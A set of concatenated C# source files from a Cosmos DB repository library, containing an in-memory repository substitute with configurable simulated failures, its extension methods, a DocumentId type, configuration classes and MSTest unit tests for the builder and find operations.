public static void GenerateExceptionOnSelectManyWhen<T>(this ICosmosDbRepository<T> self,
Func<bool> predicate,
HttpStatusCode statusCode,
string message = default)
{
if (predicate is null) throw new ArgumentNullException(nameof(predicate));
if (self is null) throw new ArgumentNullException(nameof(self));
if (!(self is CosmosDbRepositorySubstitute<T> substitute))
throw new ArgumentException($"self is not a CosmosDbRepositorySubstitute<{typeof(T).Name}>", nameof(self));
substitute.GenerateExceptionOnSelectManyWhen(predicate, statusCode, message);
}
public static void ClearGenerateExceptionOnSelectMany<T>(this ICosmosDbRepository<T> self)
{
if (self is null) throw new ArgumentNullException(nameof(self));
if (!(self is CosmosDbRepositorySubstitute<T> substitute))
throw new ArgumentException($"self is not a CosmosDbRepositorySubstitute<{typeof(T).Name}>", nameof(self));
substitute.ClearGenerateExceptionOnSelectMany();
}
public static void GenerateExceptionOnUpsertWhen<T>(this ICosmosDbRepository<T> self,
Predicate<T> predicate,
HttpStatusCode statusCode,
string message = default)
{
if (self is null) throw new ArgumentNullException(nameof(self));
if (predicate is null) throw new ArgumentNullException(nameof(predicate));
if (!(self is CosmosDbRepositorySubstitute<T> substitute))
throw new ArgumentException($"self is not a CosmosDbRepositorySubstitute<{typeof(T).Name}>", nameof(self));
substitute.GenerateExceptionOnUpsertWhen(predicate, statusCode, message);
}
public static void ClearGenerateExceptionOnUpsert<T>(this ICosmosDbRepository<T> self)
{
if (self is null) throw new ArgumentNullException(nameof(self));
if (!(self is CosmosDbRepositorySubstitute<T> substitute))
throw new ArgumentException($"self is not a CosmosDbRepositorySubstitute<{typeof(T).Name}>", nameof(self));
substitute.ClearGenerateExceptionOnUpsert();
}
public static void GenerateExceptionOnCountWhen<T>(this ICosmosDbRepository<T> self,
Func<bool> predicate,
HttpStatusCode statusCode,
string message = default)
{
if (self is null) throw new ArgumentNullException(nameof(self));
if (predicate is null) throw new ArgumentNullException(nameof(predicate));
if (!(self is CosmosDbRepositorySubstitute<T> substitute))
throw new ArgumentException($"self is not a CosmosDbRepositorySubstitute<{typeof(T).Name}>", nameof(self));
substitute.GenerateExceptionOnCountWhen(predicate, statusCode, message);
}
public static void ClearGenerateExceptionOnCount<T>(this ICosmosDbRepository<T> self)
{
if (self is null) throw new ArgumentNullException(nameof(self));
if (!(self is CosmosDbRepositorySubstitute<T> substitute))
throw new ArgumentException($"self is not a CosmosDbRepositorySubstitute<{typeof(T).Name}>", nameof(self));
substitute.ClearGenerateExceptionOnCount();
}
}
}
<file_sep>using CosmosDbRepository;
using Microsoft.Azure.Documents.Client;
using Microsoft.Extensions.DependencyInjection;
using Microsoft.Extensions.Options;
using System;
namespace CosmosDbRepositorySubstituteTest
{
public class TestingContext<T>
: ITestingContext<T>
{
public readonly DocumentClient DbClient;
public readonly ICosmosDb CosmosDb;
public readonly CosmosDbConfig DbConfig;
public readonly TestConfig TestConfig;
public readonly EnvironmentConfig EnvConfig;
public ICosmosDbRepository<T> Repo { get; private set; }
private bool _disposed;
public TestingContext(Action<ICosmosDbBuilder> builderCallback, Action<ICosmosDbRepositoryBuilder> repoBuilderCallback)
{
var services = TestFramework.Services;
DbConfig = services.GetRequiredService<IOptions<CosmosDbConfig>>().Value;
TestConfig = services.GetRequiredService<IOptions<TestConfig>>().Value.Clone();
EnvConfig = services.GetRequiredService<IOptions<EnvironmentConfig>>().Value;
if (EnvConfig.RandomizeCollectionName)
{
TestConfig.CollectionName = $"{TestConfig.CollectionName}{Guid.NewGuid()}";
}
DbClient = new DocumentClient(new Uri(DbConfig.DbEndPoint), DbConfig.DbKey);
var builder = new CosmosDbBuilder()
.WithId(DbConfig.DbName)
.WithDefaultThroughput(400)
.AddCollection<T>(TestConfig.CollectionName, repoBuilderCallback);
builderCallback?.Invoke(builder);
CosmosDb = builder.Build(DbClient);
Repo = CosmosDb.Repository<T>();
}
public void Dispose()
{
if (!_disposed && EnvConfig.DeleteCollectionsOnClose)
{
Repo.DeleteAsync();
DbClient.Dispose();
_disposed = true;
}
}
}
}<file_sep>using CosmosDbRepository;
using CosmosDbRepository.Types;
using FluentAssertions;
using Microsoft.Azure.Documents;
using Microsoft.Azure.Documents.Client;
using Microsoft.Extensions.DependencyInjection;
using Microsoft.Extensions.Options;
using Microsoft.VisualStudio.TestTools.UnitTesting;
using System;
using System.Threading.Tasks;
namespace CosmosDbRepositoryTest
{
[TestClass]
public class CosmosDbBuilderTest
{
[TestMethod]
public void WithId_NullName_Success()
{
new CosmosDbBuilder().WithId("MyCollection");
}
[TestMethod]
public void WithId_NullName_Expect_ArgumentException()
{
Func<ICosmosDbBuilder> action = () => new CosmosDbBuilder().WithId(null);
action.Should().ThrowExactly<ArgumentException>();
}
[TestMethod]
public void WithId_EmptyName_Expect_ArgumentException()
{
Func<ICosmosDbBuilder> action = () => new CosmosDbBuilder().WithId(string.Empty);
action.Should().ThrowExactly<ArgumentException>();
}
[TestMethod]
public void WithId_WhitespaceName_Expect_ArgumentException()
{
Func<ICosmosDbBuilder> action = () => new CosmosDbBuilder().WithId(" ");
action.Should().ThrowExactly<ArgumentException>();
}
[TestMethod]
public void WithId_DoubleSet_Expect_InvalidOperationException()
{
Func<ICosmosDbBuilder> action = () => new CosmosDbBuilder().WithId("1").WithId("2");
action.Should().ThrowExactly<InvalidOperationException>();
}
[TestMethod]
public void AddCollection_Success()
{
new CosmosDbBuilder().AddCollection<TestData<Guid>>();
}
[TestMethod]
public void AddCollection_WithCallback_Success()
{
new CosmosDbBuilder().AddCollection<TestData<Guid>>("MyCollection", _ => { });
}
[TestMethod]
public void AddCollection_EmptyName_Expect_ArgumentException()
{
Func<ICosmosDbBuilder> action = () => new CosmosDbBuilder().AddCollection<TestData<Guid>>(string.Empty);
action.Should().ThrowExactly<ArgumentException>();
}
[TestMethod]
public void AddCollection_WhitespaceName_Expect_ArgumentException()
{
Func<ICosmosDbBuilder> action = () => new CosmosDbBuilder().AddCollection<TestData<Guid>>(" ");
action.Should().ThrowExactly<ArgumentException>();
}
[TestMethod]
public void AddCollection_IncludeIndexPath_NullIndexPath_Expect_ArgumentException()
{
Func<ICosmosDbBuilder> action = () => new CosmosDbBuilder()
.AddCollection<TestData<Guid>>(null, bld => bld.IncludeIndexPath(null, Index.Range(DataType.String)));
action.Should().ThrowExactly<ArgumentException>();
}
[TestMethod]
public void AddCollection_IncludeIndexPath_EmptyIndexPath_Expect_ArgumentException()
{
Func<ICosmosDbBuilder> action = () => new CosmosDbBuilder()
.AddCollection<TestData<Guid>>(null, bld => bld.IncludeIndexPath(string.Empty, Index.Range(DataType.String)));
action.Should().ThrowExactly<ArgumentException>();
}
[TestMethod]
public void AddCollection_IncludeIndexPath_Success()
{
new CosmosDbBuilder()
.AddCollection<TestData<Guid>>(null, bld => bld.IncludeIndexPath("/id", Index.Range(DataType.String)));
}
[TestMethod]
public void AddCollection_ExcludeIndexPath_NullIndexPath_Expect_ArgumentNullException()
{
Func<ICosmosDbBuilder> action = () => new CosmosDbBuilder()
.AddCollection<TestData<Guid>>(null, bld => bld.ExcludeIndexPath(null));
action.Should().ThrowExactly<ArgumentNullException>();
}
[TestMethod]
public void AddCollection_ExcludeIndexPath_EmptyIndexPath_Expect_ArgumentException()
{
Func<ICosmosDbBuilder> action = () => new CosmosDbBuilder()
.AddCollection<TestData<Guid>>(null, bld => bld.ExcludeIndexPath(""));
action.Should().ThrowExactly<ArgumentException>();
}
[TestMethod]
public void AddCollection_ExcludeIndexPath_Success()
{
new CosmosDbBuilder()
.AddCollection<TestData<Guid>>(null, bld => bld.ExcludeIndexPath("/data"));
}
[TestMethod]
public void Build_Success()
{
var services = TestFramework.Services;
var dbConfig = services.GetRequiredService<IOptions<CosmosDbConfig>>().Value;
using (var dbClient = new DocumentClient(new Uri(dbConfig.DbEndPoint), dbConfig.DbKey))
{
new CosmosDbBuilder().WithId("MyDatabase").Build(dbClient);
}
}
[TestMethod]
public void Build_NoId_Expect_InvalidOperationException()
{
Func<ICosmosDb> action = () => new CosmosDbBuilder().Build(null);
action.Should().ThrowExactly<InvalidOperationException>();
}
[TestMethod]
public void Build_NullClient_Expect_InvalidOperationException()
{
Func<ICosmosDb> action = () => new CosmosDbBuilder().WithId("MyDatabase").Build(null);
action.Should().ThrowExactly<ArgumentNullException>();
}
[TestMethod]
public void Build_WithCollection_Success()
{
var services = TestFramework.Services;
var dbConfig = services.GetRequiredService<IOptions<CosmosDbConfig>>().Value;
using (var dbClient = new DocumentClient(new Uri(dbConfig.DbEndPoint), dbConfig.DbKey))
{
new CosmosDbBuilder()
.WithId("MyDatabase")
.WithDefaultThroughput(400)
.AddCollection<TestData<Guid>>()
.Build(dbClient);
}
}
[TestMethod]
public void Build_WithNamedCollection_Success()
{
var services = TestFramework.Services;
var dbConfig = services.GetRequiredService<IOptions<CosmosDbConfig>>().Value;
using (var dbClient = new DocumentClient(new Uri(dbConfig.DbEndPoint), dbConfig.DbKey))
{
new CosmosDbBuilder()
.WithId("MyDatabase")
.WithDefaultThroughput(400)
.AddCollection<TestClass>("MyTestClass")
.Build(dbClient);
}
}
[TestMethod]
public void Build_WithAttributeNamedCollection_Success()
{
var services = TestFramework.Services;
var dbConfig = services.GetRequiredService<IOptions<CosmosDbConfig>>().Value;
using (var dbClient = new DocumentClient(new Uri(dbConfig.DbEndPoint), dbConfig.DbKey))
{
new CosmosDbBuilder()
.WithId("MyDatabase")
.WithDefaultThroughput(400)
.AddCollection<TestClass>("TestClass")
.Build(dbClient);
}
}
[TestMethod]
public void Build_WithClassNamedCollection_Success()
{
var services = TestFramework.Services;
var dbConfig = services.GetRequiredService<IOptions<CosmosDbConfig>>().Value;
using (var dbClient = new DocumentClient(new Uri(dbConfig.DbEndPoint), dbConfig.DbKey))
{
new CosmosDbBuilder()
.WithId("MyDatabase")
.WithDefaultThroughput(400)
.AddCollection<TestClass2>()
.Build(dbClient);
}
}
[TestMethod]
public void Repository_WithNamedCollection_Success()
{
var services = TestFramework.Services;
var dbConfig = services.GetRequiredService<IOptions<CosmosDbConfig>>().Value;
using (var dbClient = new DocumentClient(new Uri(dbConfig.DbEndPoint), dbConfig.DbKey))
{
var db = new CosmosDbBuilder()
.WithId("MyDatabase")
.WithDefaultThroughput(400)
.AddCollection<TestClass>("MyTestClass")
.Build(dbClient);
db.Repository<TestClass>("MyTestClass");
}
}
[TestMethod]
public void Repository_WithAttributeNamedCollection_Success()
{
var services = TestFramework.Services;
var dbConfig = services.GetRequiredService<IOptions<CosmosDbConfig>>().Value;
using (var dbClient = new DocumentClient(new Uri(dbConfig.DbEndPoint), dbConfig.DbKey))
{
var db = new CosmosDbBuilder()
.WithId("MyDatabase")
.WithDefaultThroughput(400)
.AddCollection<TestClass>()
.Build(dbClient);
db.Repository<TestClass>();
}
}
[TestMethod]
public void Repository_WithClassNamedCollection_Success()
{
var services = TestFramework.Services;
var dbConfig = services.GetRequiredService<IOptions<CosmosDbConfig>>().Value;
using (var dbClient = new DocumentClient(new Uri(dbConfig.DbEndPoint), dbConfig.DbKey))
{
var db = new CosmosDbBuilder()
.WithId("MyDatabase")
.WithDefaultThroughput(400)
.AddCollection<TestClass2>()
.Build(dbClient);
db.Repository<TestClass2>();
}
}
[CosmosDbRepositoryName("TheTestClass")]
private class TestClass
{
}
private class TestClass2
{
}
//[TestMethod]
//public async Task WithId_NullName_ExpectException()
//{
// var services = TestFramework.Services;
// DbConfig = services.GetRequiredService<IOptions<CosmosDbConfig>>().Value;
// TestConfig = services.GetRequiredService<IOptions<TestConfig>>().Value.Clone();
// EnvConfig = services.GetRequiredService<IOptions<EnvironmentConfig>>().Value;
// if (EnvConfig.RandomizeCollectionName)
// {
// TestConfig.CollectionName = $"{TestConfig.CollectionName}{Guid.NewGuid()}";
// }
// DbClient = new DocumentClient(new Uri(DbConfig.DbEndPoint), DbConfig.DbKey);
// var builder = new CosmosDbBuilder()
// .WithId(DbConfig.DbName)
// .AddCollection<T>(TestConfig.CollectionName, repoBuilderCallback);
// builderCallback?.Invoke(builder);
// CosmosDb = builder.Build(DbClient);
// Repo = CosmosDb.Repository<T>();
//}
}
}
<file_sep>using FluentAssertions;
using Microsoft.VisualStudio.TestTools.UnitTesting;
using System;
using System.Linq;
using System.Threading.Tasks;
namespace CosmosDbRepositoryTest.GuidId
{
[TestClass]
public class CosmosDbRepositoryFindTests
: CosmosDbRepositoryTests<TestData<Guid>>
{
[TestMethod]
public async Task Find_Expect_Success()
{
using (var context = CreateContext())
{
var uniqueData = Guid.NewGuid().ToString();
var data = new TestData<Guid>
{
Id = Guid.NewGuid(),
Data = uniqueData
};
data = await context.Repo.AddAsync(data);
var dataList = await context.Repo.FindAsync(d => d.Data == uniqueData);
dataList.Should().NotBeNull();
dataList.Should().BeEquivalentTo(new[] { data });
}
}
[TestMethod]
public async Task Find_Expect_Success_WithNoData()
{
using (var context = CreateContext())
{
var uniqueData = Guid.NewGuid().ToString();
var dataList = await context.Repo.FindAsync(d => d.Data == uniqueData);
dataList.Should().BeEmpty();
}
}
[TestMethod]
public async Task Find_Expect_Success_OrderedAscending()
{
using (var context = CreateContext())
{
var uniqueData = Guid.NewGuid().ToString();
var data = new TestData<Guid>
{
Id = Guid.NewGuid(),
Data = uniqueData,
Rank = 1
};
data = await context.Repo.AddAsync(data);
var data2 = new TestData<Guid>
{
Id = Guid.NewGuid(),
Data = uniqueData,
Rank = 2
};
data2 = await context.Repo.AddAsync(data2);
var dataList = await context.Repo.FindAsync(d => d.Data == uniqueData, q => q.OrderBy(d => d.Rank));
dataList.Should().NotBeNull();
dataList.Should().BeEquivalentTo(new[] { data, data2 });
dataList.Should().BeInAscendingOrder(d => d.Rank);
}
}
[TestMethod]
public async Task Find_Expect_Success_OrderedDescending()
{
using (var context = CreateContext())
{
var uniqueData = Guid.NewGuid().ToString();
var data = new TestData<Guid>
{
Id = Guid.NewGuid(),
Data = uniqueData,
Rank = 1
};
data = await context.Repo.AddAsync(data);
var data2 = new TestData<Guid>
{
Id = Guid.NewGuid(),
Data = uniqueData,
Rank = 2
};
data2 = await context.Repo.AddAsync(data2);
var dataList = await context.Repo.FindAsync(d => d.Data == uniqueData, q => q.OrderByDescending(d => d.Rank));
dataList.Should().NotBeNull();
dataList.Should().BeEquivalentTo(new[] { data, data2 });
dataList.Should().BeInDescendingOrder(d => d.Rank);
}
}
[TestMethod]
public async Task Find_WithSkipTake_Expect_Success()
{
using (var context = CreateContext())
{
var uniqueData = Guid.NewGuid().ToString();
var data = new TestData<Guid>
{
Id = Guid.NewGuid(),
Data = uniqueData,
Rank = 1
};
data = await context.Repo.AddAsync(data);
var data2 = new TestData<Guid>
{
Id = Guid.NewGuid(),
Data = uniqueData,
Rank = 2
};
data2 = await context.Repo.AddAsync(data2);
var dataList = await context.Repo.FindAsync(d => d.Data == uniqueData, q => q.OrderBy(d => d.Rank).Skip(0).Take(1));
dataList.Should().NotBeNull();
dataList.Should().BeEquivalentTo(new[] { data });
dataList = await context.Repo.FindAsync(d => d.Data == uniqueData, q => q.OrderBy(d => d.Rank).Skip(1).Take(1));
dataList.Should().NotBeNull();
dataList.Should().BeEquivalentTo(new[] { data2 });
}
}
[TestMethod]
public async Task Find_WithSkipTake_NewData_Expect_Success()
{
using (var context = CreateContext())
{
var uniqueData = Guid.NewGuid().ToString();
var data = new TestData<Guid>
{
Id = Guid.NewGuid(),
Data = uniqueData,
Rank = 1
};
data = await context.Repo.AddAsync(data);
var data2 = new TestData<Guid>
{
Id = Guid.NewGuid(),
Data = uniqueData,
Rank = 2
};
data2 = await context.Repo.AddAsync(data2);
var dataList = await context.Repo.FindAsync(d => d.Data == uniqueData, q => q.OrderBy(d => d.Rank).Skip(0).Take(1));
dataList.Should().NotBeNull();
dataList.Should().BeEquivalentTo(new[] { data });
var data3 = new TestData<Guid>
{
Id = Guid.NewGuid(),
Data = uniqueData,
Rank = 3
};
data3 = await context.Repo.AddAsync(data3);
dataList = await context.Repo.FindAsync(d => d.Data == uniqueData, q => q.OrderBy(d => d.Rank).Skip(1).Take(1));
dataList.Should().NotBeNull();
dataList.Should().BeEquivalentTo(new[] { data2 });
dataList = await context.Repo.FindAsync(d => d.Data == uniqueData, q => q.OrderBy(d => d.Rank).Skip(2).Take(1));
dataList.Should().NotBeNull();
dataList.Should().BeEquivalentTo(new[] { data3 });
}
}
}
}
<file_sep>namespace CosmosDbRepositorySubstituteTest
{
public class CosmosDbConfig
{
public string DbKey { get; set; }
public string DbName { get; set; }
public string DbEndPoint { get; set; }
}
}<file_sep>using Newtonsoft.Json;
using System;
using System.Collections.Generic;
namespace CosmosDbRepository.Types
{
[JsonConverter(typeof(DocumentIdJsonConverter))]
public struct DocumentId : IEquatable<DocumentId>
{
public string Id { get; }
private DocumentId(string id)
{
Id = id;
}
public override string ToString() => Id;
public static implicit operator DocumentId(string id) => new DocumentId(id);
public static explicit operator string(DocumentId id) => id.Id;
public static implicit operator DocumentId(Guid id) => new DocumentId(id.ToString());
public static explicit operator Guid(DocumentId id) => Guid.Parse(id.Id);
public static implicit operator DocumentId(int id) => new DocumentId(id.ToString());
public static explicit operator int(DocumentId id) => int.Parse(id.Id);
public static bool operator ==(DocumentId left, DocumentId right) => left.Equals(right);
public static bool operator !=(DocumentId left, DocumentId right) => !(left == right);
public bool Equals(DocumentId other) => Id == other.Id;
public override bool Equals(object obj)
{
return obj is DocumentId id && Equals(id) ||
obj is string stringId && Equals(stringId) ||
obj is Guid guidId && Equals(guidId) ||
obj is int intId && Equals(intId);
}
public static bool IsNullOrEmpty(DocumentId id) => string.IsNullOrEmpty(id.Id);
public override int GetHashCode()
{
return 2108858624 + EqualityComparer<string>.Default.GetHashCode(Id);
}
}
}<file_sep>using CosmosDbRepository.Types;
using Microsoft.Azure.Documents;
using Microsoft.Azure.Documents.Client;
using Newtonsoft.Json;
using System;
using System.Collections.Generic;
using System.Linq;
using System.Linq.Expressions;
using System.Net;
using System.Reflection;
using System.Runtime.Serialization;
using System.Threading.Tasks;
namespace CosmosDbRepository.Substitute
{
public class CosmosDbRepositorySubstitute<T>
: ICosmosDbRepository<T>
{
private readonly List<EntityStorage> _entities = new List<EntityStorage>();
private readonly List<Func<T, DocumentClientException>> _addExceptionConditions = new List<Func<T, DocumentClientException>>();
private readonly List<Func<object, DocumentClientException>> _getExceptionConditions = new List<Func<object, DocumentClientException>>();
private readonly List<Func<object, DocumentClientException>> _deleteExceptionConditions = new List<Func<object, DocumentClientException>>();
private readonly List<Func<DocumentClientException>> _findExceptionConditions = new List<Func<DocumentClientException>>();
private readonly List<Func<DocumentClientException>> _findFirstOrDefaultExceptionConditions = new List<Func<DocumentClientException>>();
private readonly List<Func<T, DocumentClientException>> _replaceExceptionConditions = new List<Func<T, DocumentClientException>>();
private readonly List<Func<DocumentClientException>> _selectExceptionConditions = new List<Func<DocumentClientException>>();
private readonly List<Func<DocumentClientException>> _selectManyExceptionConditions = new List<Func<DocumentClientException>>();
private readonly List<Func<T, DocumentClientException>> _upsertExceptionConditions = new List<Func<T, DocumentClientException>>();
private readonly List<Func<DocumentClientException>> _countExceptionConditions = new List<Func<DocumentClientException>>();
private static readonly Type _dbExceptionType = typeof(DocumentClientException);
public string Id => throw new NotImplementedException();
public Type Type => typeof(T);
public Task<string> AltLink => throw new NotImplementedException();
public Task<T> AddAsync(T entity, RequestOptions requestOptions = null)
{
var failure = _addExceptionConditions.Select(func => func(entity)).FirstOrDefault();
if (failure != default)
{
return Task.FromException<T>(failure);
}
var item = new EntityStorage(entity);
if (DocumentId.IsNullOrEmpty(item.Id))
item.Id = Guid.NewGuid().ToString();
lock (_entities)
{
if (_entities.Any(cfg => cfg.Id == item.Id))
throw CreateDbException(HttpStatusCode.Conflict, "Duplicate id");
item.ETag = $"\"{Guid.NewGuid()}\"";
item.TS = DateTime.UtcNow.Ticks / TimeSpan.TicksPerSecond;
_entities.Add(item);
}
return Task.FromResult(DeepClone(item.Entity));
}
public Task<int> CountAsync(Expression<Func<T, bool>> predicate = null, Func<IQueryable<T>, IQueryable<T>> clauses = null, FeedOptions feedOptions = null)
{
var failure = _countExceptionConditions.Select(func => func()).FirstOrDefault();
if (failure != default)
{
return Task.FromException<int>(failure);
}
IEnumerable<T> entities;
lock (_entities)
{
entities = _entities.Select(i => i.Entity).ToArray();
}
if (predicate != default)
entities = entities.Where(predicate.Compile());
if (clauses != default)
entities = clauses.Invoke(entities.AsQueryable());
return Task.FromResult(entities.Count());
}
public Task<bool> DeleteAsync(RequestOptions requestOptions = null)
{
throw new NotImplementedException();
}
public Task<bool> DeleteDocumentAsync(DocumentId itemId, RequestOptions requestOptions = null)
{
var failure = _deleteExceptionConditions.Select(func => func(itemId)).FirstOrDefault();
if (failure != default)
{
return Task.FromException<bool>(failure);
}
bool result;
lock (_entities)
{
result = _entities.RemoveAll(cfg => cfg.Id == itemId) > 0;
}
if (result == default)
return Task.FromException<bool>(CreateDbException(HttpStatusCode.NotFound));
return Task.FromResult(result);
}
public Task<bool> DeleteDocumentAsync(T entity, RequestOptions requestOptions = null)
{
var item = new EntityStorage(entity);
var failure = _deleteExceptionConditions.Select(func => func(entity)).FirstOrDefault() ??
_deleteExceptionConditions.Select(func => func(item.Id)).FirstOrDefault();
if (failure != default)
{
return Task.FromException<bool>(failure);
}
lock (_entities)
{
var index = _entities.FindIndex(d => d.Id == item.Id);
if (index < 0)
{
return Task.FromException<bool>(CreateDbException(HttpStatusCode.NotFound));
}
if (CheckETag(entity, _entities[index], out var exception))
return Task.FromException<bool>(exception);
_entities.RemoveAt(index);
return Task.FromResult(true);
}
}
public async Task<IList<T>> FindAsync(Expression<Func<T, bool>> predicate = null, Func<IQueryable<T>, IQueryable<T>> clauses = null, FeedOptions feedOptions = null)
{
var result = await FindAsync(feedOptions?.MaxItemCount ?? 0, null, predicate, clauses, feedOptions);
return result.Items;
}
public Task<CosmosDbRepositoryPagedResults<T>> FindAsync(int pageSize, string continuationToken, Expression<Func<T, bool>> predicate = null, Func<IQueryable<T>, IQueryable<T>> clauses = null, FeedOptions feedOptions = null)
{
var failure = _findExceptionConditions.Select(func => func()).FirstOrDefault();
if (failure != default)
{
return Task.FromException<CosmosDbRepositoryPagedResults<T>>(failure);
}
IEnumerable<T> entities;
if (string.IsNullOrEmpty(continuationToken))
{
lock (_entities)
{
entities = _entities.Select(i => i.Entity).ToArray();
}
}
else
{
entities = JsonConvert.DeserializeObject<T[]>(continuationToken);
}
if (predicate != default)
entities = entities.Where(predicate.Compile());
if (clauses != default)
entities = clauses.Invoke(entities.AsQueryable());
var result = new CosmosDbRepositoryPagedResults<T>()
{
Items = entities.Select(DeepClone).ToList()
};
if (pageSize > 0 && pageSize < result.Items.Count)
{
result.ContinuationToken = JsonConvert.SerializeObject(result.Items.Skip(pageSize));
result.Items = result.Items.Take(pageSize).ToList();
}
return Task.FromResult(result);
}
public Task<T> FindFirstOrDefaultAsync(Expression<Func<T, bool>> predicate = null, Func<IQueryable<T>, IQueryable<T>> clauses = null, FeedOptions feedOptions = null)
{
var failure = _findFirstOrDefaultExceptionConditions.Select(func => func()).FirstOrDefault();
if (failure != default)
{
return Task.FromException<T>(failure);
}
IEnumerable<T> entities;
lock (_entities)
{
entities = _entities.Select(i => i.Entity).ToArray();
}
if (predicate != default)
entities = entities.Where(predicate.Compile());
if (clauses != default)
entities = clauses.Invoke(entities.AsQueryable());
return Task.FromResult(entities.FirstOrDefault());
}
public Task<T> GetAsync(T entity, RequestOptions requestOptions = null)
{
var failure = _getExceptionConditions.Select(func => func(entity)).FirstOrDefault();
if (failure != default)
{
return Task.FromException<T>(failure);
}
var item = new EntityStorage(entity);
return GetAsync(item.Id, requestOptions);
}
public Task<T> GetAsync(DocumentId itemId, RequestOptions requestOptions = null)
{
var failure = _getExceptionConditions.Select(func => func(itemId)).FirstOrDefault();
if (failure != default)
{
return Task.FromException<T>(failure);
}
EntityStorage item;
lock (_entities)
{
item = _entities.FirstOrDefault(cfg => cfg.Id == itemId);
}
return Task.FromResult(item == default ? default : DeepClone(item.Entity));
}
public Task Init()
{
throw new NotImplementedException();
}
public Task<T> ReplaceAsync(T entity, RequestOptions requestOptions = null)
{
var failure = _replaceExceptionConditions.Select(func => func(entity)).FirstOrDefault();
if (failure != default)
{
return Task.FromException<T>(failure);
}
var item = new EntityStorage(entity);
lock (_entities)
{
var index = _entities.FindIndex(d => d.Id == item.Id);
if (index < 0)
{
throw CreateDbException(HttpStatusCode.NotFound, "Not Found");
}
if (CheckETag(entity, _entities[index], out var exception))
return Task.FromException<T>(exception);
_entities.RemoveAt(index);
item.ETag = $"\"{Guid.NewGuid()}\"";
item.TS = DateTime.UtcNow.Ticks / TimeSpan.TicksPerSecond;
_entities.Add(item);
}
return Task.FromResult(DeepClone(item.Entity));
}
public async Task<IList<U>> SelectAsync<U>(Expression<Func<T, U>> selector, Func<IQueryable<U>, IQueryable<U>> selectClauses = null, FeedOptions feedOptions = null)
{
var result = await SelectAsync(feedOptions?.MaxItemCount ?? 0, default, selector, selectClauses, feedOptions);
return result.Items;
}
public Task<CosmosDbRepositoryPagedResults<U>> SelectAsync<U>(int pageSize, string continuationToken, Expression<Func<T, U>> selector, Func<IQueryable<U>, IQueryable<U>> selectClauses = null, FeedOptions feedOptions = null)
{
var failure = _selectExceptionConditions.Select(func => func()).FirstOrDefault();
if (failure != default)
{
return Task.FromException<CosmosDbRepositoryPagedResults<U>>(failure);
}
IEnumerable<T> entities;
if (string.IsNullOrEmpty(continuationToken))
{
lock (_entities)
{
entities = _entities.Select(i => i.Entity).ToArray();
}
}
else
{
entities = JsonConvert.DeserializeObject<T[]>(continuationToken);
}
var items = entities.Select(selector.Compile());
if (selectClauses != default)
items = selectClauses.Invoke(items.AsQueryable());
var result = new CosmosDbRepositoryPagedResults<U>()
{
Items = items.ToList()
};
if (pageSize > 0 && pageSize < result.Items.Count)
{
result.ContinuationToken = JsonConvert.SerializeObject(result.Items.Skip(pageSize));
result.Items = result.Items.Take(pageSize).ToList();
}
return Task.FromResult(result);
}
public async Task<IList<U>> SelectAsync<U, V>(Expression<Func<V, U>> selector, Func<IQueryable<T>, IQueryable<V>> whereClauses, Func<IQueryable<U>, IQueryable<U>> selectClauses = null, FeedOptions feedOptions = null)
{
var result = await SelectAsync(feedOptions?.MaxItemCount ?? 0, default, selector, whereClauses, selectClauses, feedOptions);
return result.Items;
}
public Task<CosmosDbRepositoryPagedResults<U>> SelectAsync<U, V>(int pageSize, string continuationToken, Expression<Func<V, U>> selector, Func<IQueryable<T>, IQueryable<V>> whereClauses, Func<IQueryable<U>, IQueryable<U>> selectClauses = null, FeedOptions feedOptions = null)
{
var failure = _selectExceptionConditions.Select(func => func()).FirstOrDefault();
if (failure != default)
{
return Task.FromException<CosmosDbRepositoryPagedResults<U>>(failure);
}
IEnumerable<T> entities;
if (string.IsNullOrEmpty(continuationToken))
{
lock (_entities)
{
entities = _entities.Select(i => i.Entity).ToArray();
}
}
else
{
entities = JsonConvert.DeserializeObject<T[]>(continuationToken);
}
var items = whereClauses.Invoke(entities.AsQueryable()).Select(selector.Compile());
if (selectClauses != default)
items = selectClauses.Invoke(items.AsQueryable());
var result = new CosmosDbRepositoryPagedResults<U>()
{
Items = items.ToList()
};
if (pageSize > 0 && pageSize < result.Items.Count)
{
result.ContinuationToken = JsonConvert.SerializeObject(result.Items.Skip(pageSize));
result.Items = result.Items.Take(pageSize).ToList();
}
return Task.FromResult(result);
}
public async Task<IList<U>> SelectManyAsync<U>(Expression<Func<T, IEnumerable<U>>> selector, Func<IQueryable<T>, IQueryable<T>> whereClauses = null, Func<IQueryable<U>, IQueryable<U>> selectClauses = null, FeedOptions feedOptions = null)
{
var result = await SelectManyAsync(feedOptions?.MaxItemCount ?? 0, default, selector, whereClauses, selectClauses, feedOptions);
return result.Items;
}
public Task<CosmosDbRepositoryPagedResults<U>> SelectManyAsync<U>(int pageSize, string continuationToken, Expression<Func<T, IEnumerable<U>>> selector, Func<IQueryable<T>, IQueryable<T>> whereClauses = null, Func<IQueryable<U>, IQueryable<U>> selectClauses = null, FeedOptions feedOptions = null)
{
var failure = _selectManyExceptionConditions.Select(func => func()).FirstOrDefault();
if (failure != default)
{
return Task.FromException<CosmosDbRepositoryPagedResults<U>>(failure);
}
IEnumerable<T> entities;
if (string.IsNullOrEmpty(continuationToken))
{
lock (_entities)
{
entities = _entities.Select(i => i.Entity).ToArray();
}
}
else
{
entities = JsonConvert.DeserializeObject<T[]>(continuationToken);
}
if (whereClauses != default)
entities = whereClauses.Invoke(entities.AsQueryable());
var items = entities.SelectMany(selector.Compile());
if (selectClauses != default)
items = selectClauses.Invoke(items.AsQueryable());
var result = new CosmosDbRepositoryPagedResults<U>()
{
Items = items.ToList()
};
if (pageSize > 0 && pageSize < result.Items.Count)
{
result.ContinuationToken = JsonConvert.SerializeObject(result.Items.Skip(pageSize));
result.Items = result.Items.Take(pageSize).ToList();
}
return Task.FromResult(result);
}
public Task<T> UpsertAsync(T entity, RequestOptions requestOptions = null)
{
var failure = _upsertExceptionConditions.Select(func => func(entity)).FirstOrDefault();
if (failure != default)
{
return Task.FromException<T>(failure);
}
var item = new EntityStorage(entity);
if (DocumentId.IsNullOrEmpty(item.Id))
item.Id = Guid.NewGuid().ToString();
lock (_entities)
{
var index = _entities.FindIndex(d => d.Id == item.Id);
if (index >= 0)
{
if (CheckETag(entity, _entities[index], out var exception))
return Task.FromException<T>(exception);
_entities.RemoveAt(index);
}
item.ETag = $"\"{Guid.NewGuid()}\"";
item.TS = DateTime.UtcNow.Ticks / TimeSpan.TicksPerSecond;
_entities.Add(item);
}
return Task.FromResult(DeepClone(item.Entity));
}
public IStoredProcedure<TResult> StoredProcedure<TResult>(string id)
{
throw new NotImplementedException();
}
